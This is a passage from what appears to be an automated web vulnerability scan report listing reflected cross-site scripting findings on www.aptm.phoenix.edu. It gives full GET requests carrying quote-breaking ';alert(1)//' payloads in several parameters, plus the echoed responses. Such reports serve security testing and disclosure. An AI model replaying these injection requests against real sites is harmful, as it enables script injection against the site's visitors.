X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48332; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=135048385.5; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:40 GMT; Path=/
Set-Cookie: vid=51922369; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:40 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:40 GMT; Path=/
Set-Cookie: plid=48332; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:40 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
<!--
       setDestURLExists(true);
       setDestURL("/AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=&kw=&kw=&channel=banr&category=&psrc=&psrc_url=&vrefid=&creative_id=389543536605f";alert(1)//45adfdbe294&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006&v1=aptm&v2=&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&addre
...[SNIP]...

5.192. http://www.aptm.phoenix.edu/ [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b0ef"%3balert(1)//b7cd0810838 was submitted in the destination parameter. This input was echoed as 6b0ef";alert(1)//b7cd0810838 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm6b0ef"%3balert(1)//b7cd0810838&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:50:07 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48598; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134808988.2; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:14 GMT; Path=/
Set-Cookie: vid=51922145; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:14 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:14 GMT; Path=/
Set-Cookie: plid=48598; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:14 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44092

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
gn_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm6b0ef";alert(1)//b7cd0810838&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=");
   
       setAllowDestURLOnSubmit(true);
   

   /* an_arr's params
    * 0 - poid
    * 1 - redirect
...[SNIP]...

5.193. http://www.aptm.phoenix.edu/ [distribution parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the distribution request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff562"%3balert(1)//f7e8dbd9af9 was submitted in the distribution parameter. This input was echoed as ff562";alert(1)//f7e8dbd9af9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targff562"%3balert(1)//f7e8dbd9af9&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:50:22 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48332; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=135048533.5; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:29 GMT; Path=/
Set-Cookie: vid=51922201; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:29 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:29 GMT; Path=/
Set-Cookie: plid=48332; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:29 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targff562";alert(1)//f7e8dbd9af9&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
   
       setAllowDestURLOnSubmit(true);
   

   /* an_arr's params
    * 0 - poid
    * 1 - redirect href
    * 2 - has popped up
...[SNIP]...

5.194. http://www.aptm.phoenix.edu/ [initiative parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the initiative request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35a6c"%3balert(1)//51687862cc2 was submitted in the initiative parameter. This input was echoed as 35a6c";alert(1)//51687862cc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen35a6c"%3balert(1)//51687862cc2&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:49:02 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48598; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134479279.3; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:09 GMT; Path=/
Set-Cookie: vid=51921989; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:09 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:09 GMT; Path=/
Set-Cookie: plid=48598; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:09 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44092

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
e=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen35a6c";alert(1)//51687862cc2&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=");
   
       setAllowDestU
...[SNIP]...

5.195. http://www.aptm.phoenix.edu/ [keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5bc8"%3balert(1)//cf689d3bc25 was submitted in the keyword parameter. This input was echoed as b5bc8";alert(1)//cf689d3bc25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006b5bc8"%3balert(1)//cf689d3bc25&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:47:52 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=135064104.4; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:59 GMT; Path=/
Set-Cookie: vid=51921805; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:59 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:59 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:59 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44302

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
Net/hhs?pid=62A1E89CCBA3FB2D&pvp_design=&kw=&kw=&channel=banr&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006b5bc8";alert(1)//cf689d3bc25&v1=aptm&v2=&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=&postal_code_int=&postal_code=&program_type=&program_type2
...[SNIP]...

5.196. http://www.aptm.phoenix.edu/ [mktg_prog parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the mktg_prog request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fe23"%3balert(1)//02c8aa1a94a was submitted in the mktg_prog parameter. This input was echoed as 5fe23";alert(1)//02c8aa1a94a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen5fe23"%3balert(1)//02c8aa1a94a&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:49:18 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48332; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=135064136.4; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:25 GMT; Path=/
Set-Cookie: vid=51922023; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:25 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:25 GMT; Path=/
Set-Cookie: plid=48332; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:25 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
e=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen5fe23";alert(1)//02c8aa1a94a&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
   
       setAllowDestURLOnSubmit(true)
...[SNIP]...

5.197. http://www.aptm.phoenix.edu/ [provider parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the provider request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0f7a"%3balert(1)//300fb6cc037 was submitted in the provider parameter. This input was echoed as a0f7a";alert(1)//300fb6cc037 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSNa0f7a"%3balert(1)//300fb6cc037&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:47:35 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134478903.3; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:42 GMT; Path=/
Set-Cookie: vid=51921769; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:42 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:42 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:42 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44232

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSNa0f7a";alert(1)//300fb6cc037&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=D55602
...[SNIP]...

5.198. http://www.aptm.phoenix.edu/ [pvp_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the pvp_campaign request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 937af"%3balert(1)//10c054b4a93 was submitted in the pvp_campaign parameter. This input was echoed as 937af";alert(1)//10c054b4a93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95937af"%3balert(1)//10c054b4a93&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:51:56 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134479413.3; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:06:03 GMT; Path=/
Set-Cookie: vid=51907359; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:06:03 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:06:03 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:06:03 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44199

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=&postal_code_int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95937af";alert(1)//10c054b4a93&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&desti
...[SNIP]...

5.199. http://www.aptm.phoenix.edu/ [unit parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the unit request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be4b9"%3balert(1)//0a352431f30 was submitted in the unit parameter. This input was echoed as be4b9";alert(1)//0a352431f30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dirbe4b9"%3balert(1)//0a352431f30&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:48:32 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134809646.2; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:39 GMT; Path=/
Set-Cookie: vid=51921913; Domain=.phoenix.edu; Path=/
